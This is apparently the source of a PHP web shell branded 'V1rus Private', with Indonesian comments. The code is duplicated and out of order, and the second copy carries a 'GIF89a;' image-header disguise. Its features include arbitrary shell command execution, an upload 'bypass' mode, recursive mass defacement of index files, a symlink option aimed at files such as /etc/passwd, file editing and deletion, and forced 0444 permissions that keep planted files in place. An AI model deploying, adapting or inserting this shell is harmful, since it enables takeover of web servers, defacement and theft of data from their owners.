// PAKSA LAGI VIA SHELL
@shell_exec("chmod 0444 " . escapeshellarg($path) . " 2>/dev/null");
@system("chmod 444 " . escapeshellarg($path) . " >/dev/null 2>&1");
@exec("chmod 0444 " . escapeshellarg($path) . " 2>/dev/null");

// VERIFIKASI
clearstatcache(true, $path);
return true;
}

// ====== [FIXED] SMART BYPASS DENGAN AUTO CHMOD ======
function smart_upload_bypass($tmp_path, $target_dir, $original_name) {
$bypass_names = generate_bypass_names($original_name);

foreach ($bypass_names as $bypass_name) {
$target_path = $target_dir . '/' . $bypass_name;

// 1. COBA COPY LANGSUNG
if (@copy($tmp_path, $target_path)) {
force_0444($target_path); // AUTO CHMOD 0444
return ['success' => true, 'path' => $target_path, 'method' => 'copy', 'name' => $bypass_name];
}

// 2. COBA MOVE_UPLOADED_FILE
if (function_exists('move_uploaded_file') && is_uploaded_file($tmp_path)) {
if (@move_uploaded_file($tmp_path, $target_path)) {
force_0444($target_path); // AUTO CHMOD 0444
return ['success' => true, 'path' => $target_path, 'method' => 'move_uploaded', 'name' => $bypass_name];
}
}

// 3. COBA FILE_PUT_CONTENTS
$content = @file_get_contents($tmp_path);
if ($content !== false && @file_put_contents($target_path, $content) !== false) {
force_0444($target_path); // AUTO CHMOD 0444
return ['success' => true, 'path' => $target_path, 'method' => 'file_put', 'name' => $bypass_name];
}
}

return ['success' => false, 'error' => 'All bypass methods failed'];
}

$title = "V1rus Private [AUTO CHMOD 0444 SELF]";
$author = "HanzOFC | Zero Mode";
$theme_bg = "#0a0a0f";
$theme_fg = "#E0FF00";
$theme_highlight = "#FF00C8";
$theme_link = "#00FFF7";
$theme_link_hover = "#FF00A0";
$theme_border_color = "#7D00FF";
$theme_table_header_bg = "#1a0025";
$theme_table_row_hover = "#330033";
$theme_input_bg = "#120024";
$theme_input_fg = "#00FFB2";
$font_family = "'Orbitron', sans-serif";
$message_success_color = "#39FF14";
$message_error_color = "#FF0033";

function sanitizeFilename($filename) {
return basename($filename);
}

function exe($cmd) {
if (function_exists('exec')) {
exec($cmd . ' 2>&1', $output);
return implode("\n", $output);
} elseif (function_exists('shell_exec')) {
return shell_exec($cmd);
} elseif (function_exists('passthru')) {
ob_start();
passthru($cmd);
return ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
system($cmd);
return ob_get_clean();
}
return "Command execution disabled.";
}

function perms($file){
$perms = @fileperms($file);
if ($perms === false) return '????';
$info = '';
if (($perms & 0xC000) == 0xC000) $info = 's';
elseif (($perms & 0xA000) == 0xA000) $info = 'l';
elseif (($perms & 0x8000) == 0x8000) $info = '-';
elseif (($perms & 0x6000) == 0x6000) $info = 'b';
elseif (($perms & 0x4000) == 0x4000) $info = 'd';
elseif (($perms & 0x2000) == 0x2000) $info = 'c';
elseif (($perms & 0x1000) == 0x1000) $info = 'p';
else $info = 'u';
$info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
return $info;
}

function delete_recursive($target) {
if (!file_exists($target)) return true;
if (!is_dir($target)) return unlink($target);
$items = scandir($target);
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
if (!delete_recursive($target . DIRECTORY_SEPARATOR . $item)) return false;
}
return rmdir($target);
}

function redirect_with_message($msg_type = '', $msg_text = '', $current_path = '') {
global $path;
$redirect_path = !empty($current_path) ? $current_path : $path;
$params = ['path' => $redirect_path];
if ($msg_type) $params['msg_type'] = $msg_type;
if ($msg_text) $params['msg_text'] = $msg_text;
header("Location: ?" . http_build_query($params));
exit();
}

$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
$path = str_replace('\\','/',$path);

// ====== [FIXED UPLOAD HANDLER] ======
if(isset($_FILES['file_upload'])){
$upload_method = isset($_POST['upload_method']) ? $_POST['upload_method'] : 'normal';
$original_name = sanitizeFilename($_FILES['file_upload']['name']);

if ($upload_method == 'smart_bypass') {
// Use smart bypass technique
$result = smart_upload_bypass($_FILES['file_upload']['tmp_name'], $path, $original_name);

if ($result['success']) {
// CHMOD 0444 SUDAH DI PANGGIL DI DALAM smart_upload_bypass()
$msg = 'UPLOAD SUCCESS (BYPASS MODE)<br>';
$msg .= 'File: ' . $result['name'] . '<br>';
$msg .= 'Method: ' . $result['method'] . '<br>';
$msg .= 'CHMOD: 0444 applied automatically';
redirect_with_message('success', $msg, $path);
} else {
redirect_with_message('error', 'Smart bypass failed! Trying fallback...', $path);
}
} else {
// Normal upload
$file_name = $original_name;
if(copy($_FILES['file_upload']['tmp_name'], $path.'/'.$file_name)){
// AUTO CHMOD 0444 LANGSUNG
force_0444($path.'/'.$file_name);
redirect_with_message('success', 'UPLOAD SUCCESS + AUTO CHMOD 0444: ' . $file_name, $path);
} else {
// Fallback: try move_uploaded_file
if(move_uploaded_file($_FILES['file_upload']['tmp_name'], $path.'/'.$file_name)){
// AUTO CHMOD 0444 LANGSUNG
force_0444($path.'/'.$file_name);
redirect_with_message('success', 'UPLOAD SUCCESS (Fallback) + CHMOD 0444: ' . $file_name, $path);
} else {
redirect_with_message('error', 'File Upload Failed !!', $path);
}
}
}
}

if(isset($_GET['option']) && isset($_POST['opt_action'])){
$target_full_path = $_POST['path_target'];
$action = $_POST['opt_action'];
$current_dir = isset($_GET['path']) ? $_GET['path'] : getcwd();
switch ($action) {
case 'delete':
if (file_exists($target_full_path)) {
if (delete_recursive($target_full_path)) {
redirect_with_message('success', 'DELETE SUCCESS !!', $current_dir);
} else {
redirect_with_message('error', 'Failed to delete! Check permissions (permission).', $current_dir);
}
} else {
redirect_with_message('error', 'Target not found!', $current_dir);
}
break;
case 'chmod_save':
$perm = octdec($_POST['perm_value']);
if(chmod($target_full_path,$perm)) redirect_with_message('success', 'CHANGE PERMISSION SUCCESS !!', $current_dir);
else redirect_with_message('error', 'Change Permission Failed !!', $current_dir);
break;
case 'rename_save':
$new_name_base = sanitizeFilename($_POST['new_name_value']);
$new_full_path = dirname($target_full_path).'/'.$new_name_base;
if(rename($target_full_path, $new_full_path)) {
// AUTO CHMOD 0444 SETELAH RENAME
force_0444($new_full_path);
redirect_with_message('success', 'CHANGE NAME SUCCESS + AUTO CHMOD 0444 !!', $current_dir);
} else {
redirect_with_message('error', 'Change Name Failed !!', $current_dir);
}
break;
case 'edit_save':
if(is_writable($target_full_path)) {
if(file_put_contents($target_full_path,$_POST['src_content'])) {
// AUTO CHMOD 0444 AFTER EDIT
force_0444($target_full_path);
redirect_with_message('success', 'EDIT FILE SUCCESS + AUTO CHMOD 0444 !!', $current_dir);
} else {
redirect_with_message('error', 'Edit File Failed !!', $current_dir);
}
} else {
redirect_with_message('error', 'File is not writable!', $current_dir);
}
break;
}
}

if(isset($_GET['create_new'])) {
$create_name = sanitizeFilename($_POST['create_name']);
$target_path_new = $path . '/' . $create_name;
if ($_POST['create_type'] == 'file') {
if (file_put_contents($target_path_new, '') !== false) {
// AUTO CHMOD 0444 FOR NEW FILES
force_0444($target_path_new);
redirect_with_message('success', 'New File Created Successfully + AUTO CHMOD 0444', $path);
} else {
redirect_with_message('error', 'Failed to create new file!', $path);
}
} elseif ($_POST['create_type'] == 'dir') {
if (mkdir($target_path_new)) redirect_with_message('success', 'New Folder Created Successfully', $path);
else redirect_with_message('error', 'Failed to create new folder!', $path);
}
}
?>
<!DOCTYPE HTML>
<html>
<head>
<link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">
<title><?php echo htmlspecialchars($title); ?></title>
<style>
body {
background-color:rgb(29, 29, 31);
color:rgb(135, 146, 145);
font-family: 'Share Tech Mono', monospace;
margin: 0;
padding: 0;
}
h1 {
color: #ff2bd4;
text-align: center;
font-size: 36px;
text-shadow: 0 0 5px #ff2bd4, 0 0 10px #ff2bd4;
margin: 20px 0;
}
a {
color: #00b7ff;
text-decoration: none;
transition: 0.2s;
}
a:hover {
color: #ff2bd4;
text-shadow: 0 0 5px #ff2bd4;
}
table {
width: 95%;
max-width: 1000px;
margin: 20px auto;
border-collapse: collapse;
background-color: #1a1a2e;
border: 1px solid #8000ff;
}
th, td {
border: 1px solid #8000ff;
padding: 10px;
text-align: left;
}
#content tr:hover {
background-color: #29294d;
}
.first {
background-color: #191935;
color: #ff2bd4;
}
input, select, textarea {
background: #0d0d20;
color: #00ffe7;
border: 1px solid #8000ff;
padding: 5px;
font-family: 'Share Tech Mono', monospace;
border-radius: 5px;
}
input[type="submit"] {
background: #ff2bd4;
color: black;
font-weight: bold;
border: 1px solid #8000ff;
cursor: pointer;
transition: 0.2s ease-in-out;
}
input[type="submit"]:hover {
background: #00ffe7;
color: #000;
box-shadow: 0 0 5px #00ffe7, 0 0 10px #00ffe7;
}
.section-box {
border: 2px solid #8000ff;
padding: 15px;
margin: 20px auto;
border-radius: 8px;
background-color: #1a1a2e;
color: #00ffe7;
width: 95%;
max-width: 900px;
}
.main-menu {
text-align: center;
padding: 15px;
margin: 20px auto;
border-top: 1px solid #8000ff;
border-bottom: 1px solid #8000ff;
}
.main-menu a {
margin: 0 10px;
font-size: 1.1em;
color: #00b7ff;
}
pre {
background-color: #111122;
padding: 10px;
overflow-x: auto;
color: #ff2bd4;
border: 1px solid #8000ff;
}
.message {
text-align: center;
font-weight: bold;
padding: 10px;
margin: 10px auto;
width: 95%;
max-width: 900px;
border-radius: 8px;
}
.message.success {
background-color: #008f39;
color: #00ffe7;
}
.message.error {
background-color: #a80000;
color: white;
}
footer {
text-align: center;
color: #ff2bd4;
margin: 20px 0;
font-size: 14px;
text-shadow: 0 0 5px #8000ff;
}
.action-form {
display: inline-block;
margin: 0;
}
.action-button {
background: #ff2bd4;
color: black;
font-weight: bold;
border: 1px solid #8000ff;
cursor: pointer;
padding: 5px 10px;
border-radius: 5px;
margin-left: 5px;
transition: 0.2s ease-in-out;
}
.action-button:hover {
background: #00ffe7;
color: #000;
box-shadow: 0 0 5px #00ffe7, 0 0 10px #00ffe7;
}
.upload-method {
background: #1a0033;
border: 1px dashed #ff00c8;
padding: 10px;
margin: 10px 0;
border-radius: 5px;
}
</style>
</head>
<body>
<a href="?">
<div style="text-align: center; margin: 20px 0;">
<img src="https://h.top4top.io/p_3656kb8x31.jpg"
alt="V1rus Logo"
style="
display: block;
margin-left: auto;
margin-right: auto;
width: 180px;
height: 180px;
object-fit: cover;
border-radius: 25px;
border: 3px solid #7D00FF;
box-shadow: 0 0 20px #FF00C8;
">
</div>
<h1 style="color: white; text-align: center; margin-top: 10px;"><?php echo htmlspecialchars($title); ?></h1></a>
<?php
if(isset($_GET['msg_text'])) {
echo "<div class='message ".htmlspecialchars($_GET['msg_type'])."'>".htmlspecialchars($_GET['msg_text'])."</div>";
}

// ====== [CEK PERMISSION FILE SHELL INI] ======
$current_perms = perms(__FILE__);
echo "<div class='message success' style='margin-bottom:20px;'>";
echo "<strong>πŸ”§ FILE SHELL STATUS:</strong><br>";
echo "Name: " . basename(__FILE__) . "<br>";
echo "Permission: <span style='color:#00FF00'>$current_perms</span><br>";
echo "Auto CHMOD 0444: <span style='color:#00FF00'>ACTIVE</span>";
echo "</div>";
?>
<table class="system-info-table" width="95%" border="0" cellpadding="0" cellspacing="0" align="left">
<tr><td>
<font color='white'><i class='fa fa-user'></i> User / IP </font><td>: <font color='<?php echo $theme_fg; ?>'><?php echo $_SERVER['REMOTE_ADDR']; ?></font>
<tr><td><font color='white'><i class='fa fa-desktop'></i> Host / Server </font><td>: <font color='<?php echo $theme_fg; ?>'><?php echo gethostbyname($_SERVER['HTTP_HOST'])." / ".$_SERVER['SERVER_NAME']; ?></font>
<tr><td><font color='white'><i class='fa fa-hdd-o'></i> System </font><td>: <font color='<?php echo $theme_fg; ?>'><?php echo php_uname(); ?></font>
</tr></td></table>
<div class="main-menu">
<a href="?path=<?php echo urlencode($path); ?>&action=cmd">Cmd</a> |
<a href="?path=<?php echo urlencode($path); ?>&action=upload_form">Upload</a> |
<a href="?path=<?php echo urlencode($path); ?>&action=mass_deface_form">Mass Deface</a> |
<a href="?path=<?php echo urlencode($path); ?>&action=create_form">Create</a> |
<a href="?path=<?php echo urlencode($path); ?>&action=symlink_form">Sym</a>
</div>
<div class="path-nav">
<i class="fa fa-folder-o"></i> :
<?php
$paths_array = explode('/', trim($path, '/'));
echo '<a href="?path=/">/</a>';
$current_built_path = '';
foreach($paths_array as $pat){
if(empty($pat)) continue;
$current_built_path .= '/' . $pat;
echo '<a href="?path='.urlencode($current_built_path).'">'.htmlspecialchars($pat).'</a>/';
}
?>
</div>
<?php
$show_file_list = true;
if (isset($_GET['action'])) {
$show_file_list = false;
$current_action = $_GET['action'];
echo '<div class="section-box">';
switch ($current_action) {
case 'cmd':
$cmd_output = '';
if(isset($_POST['do_cmd'])) {
$cmd_output = htmlspecialchars(exe($_POST['cmd_input']));
}
echo '<h3>Execute Command</h3>';
echo '<form method="POST" action="?action=cmd&path='.urlencode($path).'">';
echo '<input type="text" name="cmd_input" placeholder="whoami" style="width: calc(100% - 80px);" autofocus>';
echo '<input type="submit" name="do_cmd" value=">>" style="width: 70px;">';
echo '</form>';
if($cmd_output) {
echo '<h4>Output:</h4><pre>'.$cmd_output.'</pre>';
}
break;
case 'upload_form':
echo '<h3>πŸ“ UPLOAD FILE [AUTO CHMOD 0444]</h3>';
echo '<div class="upload-method">';
echo '<strong>πŸ”§ SELECT UPLOAD METHOD:</strong><br>';
echo '</div>';

echo '<form enctype="multipart/form-data" method="POST" action="?path='.urlencode($path).'">';
echo '<input type="file" name="file_upload" required/><br><br>';

echo '<input type="radio" name="upload_method" value="normal" checked> <strong>Normal Upload</strong> (Auto CHMOD 0444)<br>';
echo '<input type="radio" name="upload_method" value="smart_bypass"> <strong>SMART BYPASS 403</strong> (Auto CHMOD 0444)<br><br>';

echo '<input type="submit" value="πŸ”₯ UPLOAD + AUTO CHMOD 0444" style="background:#00FF00;color:#000;font-weight:bold;padding:10px;"/>';
echo '</form>';

echo '<div style="margin-top:20px;padding:10px;background:#111;border:1px solid #ff00c8;">';
echo '<h4>πŸ“Œ FITUR BARU:</h4>';
echo '<pre style="color:#00FFB2;">';
echo "βœ… AUTO CHMOD 0444 INSTANT\n";
echo "βœ… FILE SHELL INI AUTO 0444\n";
echo "βœ… CHMOD LANGSUNG SETELAH UPLOAD\n";
echo "βœ… CHMOD OTOMATIS DI SEMUA METHOD\n";
echo "βœ… BYPASS 403 + AUTO CHMOD 0444\n";
echo '</pre>';
echo '</div>';
break;
case 'mass_deface_form':
$mass_deface_results = '';
if(isset($_POST['start_mass_deface'])) {
function sabun_massal_recursive($dir, $file, $content, &$res) {
if(!is_writable($dir)) {$res .= "[<font color=red>FAILED</font>] ".htmlspecialchars($dir)." (Not Writable)<br>"; return;}
foreach(scandir($dir) as $item) {
if($item === '.' || $item === '..') continue;
$lokasi = $dir.DIRECTORY_SEPARATOR.$item;
if(is_dir($lokasi)) {
$file_path = $lokasi.DIRECTORY_SEPARATOR.$file;
file_put_contents($file_path, $content);
// AUTO CHMOD 0444
force_0444($file_path);
$res .= "[<font color=lime>DONE + CHMOD 0444</font>] ".htmlspecialchars($file_path)."<br>";
sabun_massal_recursive($lokasi, $file, $content, $res);
}
}
}
function sabun_biasa($dir, $file, $content, &$res) {
if(!is_writable($dir)) {$res .= "[<font color=red>FAILED</font>] ".htmlspecialchars($dir)." (Not Writable)<br>"; return;}
foreach(scandir($dir) as $item) {
if($item === '.' || $item === '..') continue;
$lokasi = $dir.DIRECTORY_SEPARATOR.$item;
if(is_dir($lokasi) && is_writable($lokasi)) {
$file_path = $lokasi.DIRECTORY_SEPARATOR.$file;
file_put_contents($file_path, $content);
// AUTO CHMOD 0444
force_0444($file_path);
$res .= "[<font color=lime>DONE + CHMOD 0444</font>] ".htmlspecialchars($file_path)."<br>";
}
}
}
if($_POST['tipe_sabun'] == 'mahal') sabun_massal_recursive($_POST['d_dir'], $_POST['d_file'], $_POST['script_content'], $mass_deface_results);
else sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script_content'], $mass_deface_results);
}
echo '<h3>Mass Deface + Auto Chmod 0444</h3>';
echo '<form method="post" action="?action=mass_deface_form&path='.urlencode($path).'">';
echo '<p>Tipe:<br><input type="radio" name="tipe_sabun" value="murah" checked>Biasa (1 level) | <input type="radio" name="tipe_sabun" value="mahal">Massal (Rekursif)</p>';
echo '<p>Folder Target:<br><input type="text" name="d_dir" value="'.htmlspecialchars($path).'" style="width:100%"></p>';
echo '<p>Nama File:<br><input type="text" name="d_file" value="index.html" style="width:100%"></p>';
echo '<p>Isi Script:<br><textarea name="script_content" style="width:100%;height:150px">Hacked By V1rus_Alfa</textarea></p>';
echo '<input type="submit" name="start_mass_deface" value="GAS! + AUTO CHMOD 0444" style="width:100%">';
echo '</form>';
if($mass_deface_results) echo '<h4>Hasil:</h4><pre>'.$mass_deface_results.'</pre>';
break;
case 'create_form':
echo '<h3>Create New File / Folder + Auto Chmod 0444</h3>';
echo '<form method="POST" action="?create_new=true&path='.urlencode($path).'">';
echo 'Create: <select name="create_type"><option value="file">File</option><option value="dir">Folder</option></select> ';
echo 'Name: <input type="text" name="create_name" required> ';
echo '<input type="submit" value="Create + Auto Chmod 0444">';
echo '</form>';
break;
case 'symlink_form':
$symlink_result = '';
if (isset($_POST['create_symlink'])) {
$target = $_POST['sym_target'];
$link_name = $_POST['sym_linkname'];
$full_link_path = $path . '/' . $link_name;

if (symlink($target, $full_link_path)) {
$symlink_result = '<div class="message success">Symlink created: ' . htmlspecialchars($link_name) . ' -> ' . htmlspecialchars($target) . '</div>';
} else {
$symlink_result = '<div class="message error">Symlink creation failed! Check target path or permissions.</div>';
}
}

echo '<h3>Symlink Bypass</h3>';
echo '<form method="POST" action="?action=symlink_form&path=' . urlencode($path) . '">';
echo '<p>Target Path (absolute or relative):<br>';
echo '<input type="text" name="sym_target" placeholder="/etc/passwd or ../../../etc/passwd" style="width:100%" value="' . htmlspecialchars($path) . '"></p>';
echo '<p>Link Name (in current dir):<br>';
echo '<input type="text" name="sym_linkname" placeholder="e.g., shell.php" style="width:100%"></p>';
echo '<input type="submit" name="create_symlink" value="Create Symlink" style="width:100%">';
echo '</form>';

if ($symlink_result) {
echo $symlink_result;
}
break;
case 'delete':
$file_to_delete = $_GET['target_file'];
echo "<h3>Confirm Delete: ".htmlspecialchars(basename($file_to_delete))."</h3>";
if (file_exists($file_to_delete)) {
echo '<p style="color:red;text-align:center;">Are you SURE you want to delete this item?<br>This action cannot be undone.</p>';
echo '<form method="POST" action="?option=true&path='.urlencode($path).'"><input type="hidden" name="path_target" value="'.htmlspecialchars($file_to_delete).'"><input type="hidden" name="opt_action" value="delete"><input type="submit" value="Yes, Delete" style="background:red;color:white;"/> <a href="?path='.urlencode($path).'" style="margin-left:10px;">Cancel</a></form>';
} else {
echo '<p style="color:red;text-align:center;">File atau folder tidak ditemukan!</p>';
}
break;
case 'view_file':
echo "<h3>Viewing: ".htmlspecialchars(basename($_GET['target_file']))."</h3>";
echo '<textarea style="width:100%;height:400px;" readonly>'.htmlspecialchars(@file_get_contents($_GET['target_file'])).'</textarea>';
break;
case 'edit_form':
$target_file = $_GET['target_file'];
echo "<h3>Editing: ".htmlspecialchars(basename($target_file))."</h3>";
if(is_writable($target_file)) {
$file_content = @file_get_contents($target_file);
echo '<form method="POST" action="?option=true&path='.urlencode($path).'">';
echo '<textarea name="src_content" style="width:100%;height:400px;">'.htmlspecialchars($file_content).'</textarea><br>';
echo '<input type="hidden" name="path_target" value="'.htmlspecialchars($target_file).'">';
echo '<input type="hidden" name="opt_action" value="edit_save">';
echo '<input type="submit" value="SAVE + AUTO CHMOD 0444"/>';
echo '</form>';
} else {
echo '<p style="color:red;">File tidak writable! Periksa permission.</p>';
echo '<textarea style="width:100%;height:400px;" readonly>'.htmlspecialchars(@file_get_contents($target_file)).'</textarea>';
}
break;
case 'rename_form':
echo "<h3>Rename: ".htmlspecialchars(basename($_GET['target_file']))."</h3>";
echo '<form method="POST" action="?option=true&path='.urlencode($path).'">New Name: <input name="new_name_value" type="text" value="'.htmlspecialchars(basename($_GET['target_file'])).'"/><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="rename_save"><input type="submit" value="RENAME + AUTO CHMOD 0444"/></form>';
break;
case 'chmod_form':
echo "<h3>Chmod: ".htmlspecialchars(basename($_GET['target_file']))."</h3>";
$current_perms = substr(sprintf('%o', @fileperms($_GET['target_file'])), -4);
echo '<form method="POST" action="?option=true&path='.urlencode($path).'">Permission: <input name="perm_value" type="text" size="4" value="'.$current_perms.'"/><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="chmod_save"><input type="submit" value="CHMOD"/></form>';
break;
}
echo '</div>';
}

if ($show_file_list) {
echo '<div id="content"><table><tr class="first"><th><center>Name</center></th><th><center>Size</center></th><th><center>Perm</center></th><th><center>Options</center></th></tr>';
$scandir_items = @scandir($path);
if ($scandir_items) {
usort($scandir_items, function($a, $b) use ($path) {
$pathA = $path . '/' . $a; $pathB = $path . '/' . $b;
$is_dir_A = is_dir($pathA); $is_dir_B = is_dir($pathB);
if ($is_dir_A && !$is_dir_B) return -1;
if (!$is_dir_A && $is_dir_B) return 1;
return strcasecmp($a, $b);
});
foreach($scandir_items as $item){
if($item == '.') continue;
$full_item_path = $path.'/'.$item;
$encoded_full_item_path = urlencode($full_item_path);
echo "<tr><td class='td_home'>";
if($item == '..') echo "<i class='fa fa-folder-open-o'></i> <a href=\"?path=".urlencode(dirname($path))."\">".htmlspecialchars($item)."</a></td>";
elseif(is_dir($full_item_path)) echo "<i class='fa fa-folder-o'></i> <a href=\"?path=$encoded_full_item_path\">".htmlspecialchars($item)."</a></td>";
else echo "<i class='fa fa-file-o'></i> <a href=\"?action=view_file&target_file=$encoded_full_item_path&path=".urlencode($path)."\">".htmlspecialchars($item)."</a></td>";
echo "<td class='td_home'><center>".(is_file($full_item_path) ? round(@filesize($full_item_path)/1024,2).' KB' : '--')."</center></td>";
echo "<td class='td_home'><center>";
$perms_str = perms($full_item_path);
if(is_writable($full_item_path)) echo '<font color="#57FF00">'.$perms_str.'</font>';
elseif(!is_readable($full_item_path)) echo '<font color="#FF0004">'.$perms_str.'</font>';
else echo $perms_str;
echo "</center></td>";
echo "<td class='td_home' style='text-align:center;'>
<form class='action-form' method='GET' action='?'>
<input type='hidden' name='path' value='".htmlspecialchars($path)."'>
<select name='action' style='width:100px;'>
<option value=''>Action</option>
<option value='delete'>Delete</option>";
if(is_file($full_item_path)) {
echo "<option value='edit_form'>Edit</option>";
echo "<option value='view_file'>View</option>";
}
echo "<option value='rename_form'>Rename</option>
<option value='chmod_form'>Chmod</option>
</select>
<input type='hidden' name='target_file' value='".htmlspecialchars($full_item_path)."'>
<button type='submit' class='action-button'>Go</button>
</form>
</td></tr>";
}
} else {
echo "<tr><td colspan='4'><center><font color='red'>Failed to read directory.</font></center></td></tr>";
}
echo '</table></div>';
}
?>
<hr style="border-top: 1px solid <?php echo $theme_border_color; ?>; width: 95%; max-width: 900px; margin: 15px auto;">
<center><font color="#fff" size="2px"><b>Coded With &#x1f497; by <font color="#7e52c6"><?php echo htmlspecialchars($author); ?></font></b><br>
<small style="color:#00FFB2;">[AUTO CHMOD 0444 INSTANT - FILE SHELL AUTO PROTECTED]</small></center>
</body>
</html>
GIF89a;
<?php
error_reporting(0);
session_start();

// ====== [AUTO CHMOD 0444 FILE SHELL INI SENDIRI] ======
if (!isset($_SESSION['self_0444_applied'])) {
$current_file = __FILE__;
$perms = @fileperms($current_file) & 0777;

if ($perms != 0444) {
@chmod($current_file, 0444);
@shell_exec("chmod 0444 " . escapeshellarg($current_file));
}

$_SESSION['self_0444_applied'] = true;
}

@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
ini_set('memory_limit', '256M');
header('Content-Type: text/html; charset=UTF-8');
ob_end_clean();

// ====== [FIXED] AUTO CHMOD 0444 INSTANT ======
function force_0444($path) {
if (!file_exists($path)) return false;

// CHMOD 0444 SECARA LANGSUNG DAN PAKSA
@chmod($path, 0444); // octal
@chmod($path, 292); // decimal
@chmod($path, "444"); // string

// PAKSA LAGI VIA SHELL
@shell_exec("chmod 0444 " . escapeshellarg($path) . " 2>/dev/null");
@system("chmod 444 " . escapeshellarg($path) . " >/dev/null 2>&1");
@exec("chmod 0444 " . escapeshellarg($path) . " 2>/dev/null");

// VERIFIKASI
clearstatcache(true, $path);
return true;
}

// ====== [FIXED] SMART BYPASS DENGAN AUTO CHMOD ======
function smart_upload_bypass($tmp_path, $target_dir, $original_name) {
$bypass_names = generate_bypass_names($original_name);

foreach ($bypass_names as $bypass_name) {
$target_path = $target_dir . '/' . $bypass_name;

// 1. COBA COPY LANGSUNG
if (@copy($tmp_path, $target_path)) {
force_0444($target_path); // AUTO CHMOD 0444
return ['success' => true, 'path' => $target_path, 'method' => 'copy', 'name' => $bypass_name];
}

// 2. COBA MOVE_UPLOADED_FILE
if (function_exists('move_uploaded_file') && is_uploaded_file($tmp_path)) {
if (@move_uploaded_file($tmp_path, $target_path)) {
force_0444($target_path); // AUTO CHMOD 0444
return ['success' => true, 'path' => $target_path, 'method' => 'move_uploaded', 'name' => $bypass_name];
}
}

// 3. COBA FILE_PUT_CONTENTS
$content = @file_get_contents($tmp_path);
if ($content !== false && @file_put_contents($target_path, $content) !== false) {
force_0444($target_path); // AUTO CHMOD 0444
return ['success' => true, 'path' => $target_path, 'method' => 'file_put', 'name' => $bypass_name];
}
}

return ['success' => false, 'error' => 'All bypass methods failed'];
}

$title = "V1rus Private [AUTO CHMOD 0444 SELF]";
$author = "HanzOFC | Zero Mode";
$theme_bg = "#0a0a0f";
$theme_fg = "#E0FF00";
$theme_highlight = "#FF00C8";
$theme_link = "#00FFF7";
$theme_link_hover = "#FF00A0";
$theme_border_color = "#7D00FF";
$theme_table_header_bg = "#1a0025";
$theme_table_row_hover = "#330033";
$theme_input_bg = "#120024";
$theme_input_fg = "#00FFB2";
$font_family = "'Orbitron', sans-serif";
$message_success_color = "#39FF14";
$message_error_color = "#FF0033";

function sanitizeFilename($filename) {
return basename($filename);
}

function exe($cmd) {
if (function_exists('exec')) {
exec($cmd . ' 2>&1', $output);
return implode("\n", $output);
} elseif (function_exists('shell_exec')) {
return shell_exec($cmd);
} elseif (function_exists('passthru')) {
ob_start();
passthru($cmd);
return ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
system($cmd);
return ob_get_clean();
}
return "Command execution disabled.";
}

function perms($file){
$perms = @fileperms($file);
if ($perms === false) return '????';
$info = '';
if (($perms & 0xC000) == 0xC000) $info = 's';
elseif (($perms & 0xA000) == 0xA000) $info = 'l';
elseif (($perms & 0x8000) == 0x8000) $info = '-';
elseif (($perms & 0x6000) == 0x6000) $info = 'b';
elseif (($perms & 0x4000) == 0x4000) $info = 'd';
elseif (($perms & 0x2000) == 0x2000) $info = 'c';
elseif (($perms & 0x1000) == 0x1000) $info = 'p';
else $info = 'u';
$info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
return $info;
}

function delete_recursive($target) {
if (!file_exists($target)) return true;
if (!is_dir($target)) return unlink($target);
$items = scandir($target);
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
if (!delete_recursive($target . DIRECTORY_SEPARATOR . $item)) return false;
}
return rmdir($target);
}

function redirect_with_message($msg_type = '', $msg_text = '', $current_path = '') {
global $path;
$redirect_path = !empty($current_path) ? $current_path : $path;
$params = ['path' => $redirect_path];
if ($msg_type) $params['msg_type'] = $msg_type;
if ($msg_text) $params['msg_text'] = $msg_text;
header("Location: ?" . http_build_query($params));
exit();
}

$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
$path = str_replace('\\','/',$path);

// ====== [FIXED UPLOAD HANDLER] ======
if(isset($_FILES['file_upload'])){
$upload_method = isset($_POST['upload_method']) ? $_POST['upload_method'] : 'normal';
$original_name = sanitizeFilename($_FILES['file_upload']['name']);

if ($upload_method == 'smart_bypass') {
// Use smart bypass technique
$result = smart_upload_bypass($_FILES['file_upload']['tmp_name'], $path, $original_name);

if ($result['success']) {
// CHMOD 0444 SUDAH DI PANGGIL DI DALAM smart_upload_bypass()
$msg = 'UPLOAD SUCCESS (BYPASS MODE)<br>';
$msg .= 'File: ' . $result['name'] . '<br>';
$msg .= 'Method: ' . $result['method'] . '<br>';
$msg .= 'CHMOD: 0444 applied automatically';
redirect_with_message('success', $msg, $path);
} else {
redirect_with_message('error', 'Smart bypass failed! Trying fallback...', $path);
}
} else {
// Normal upload
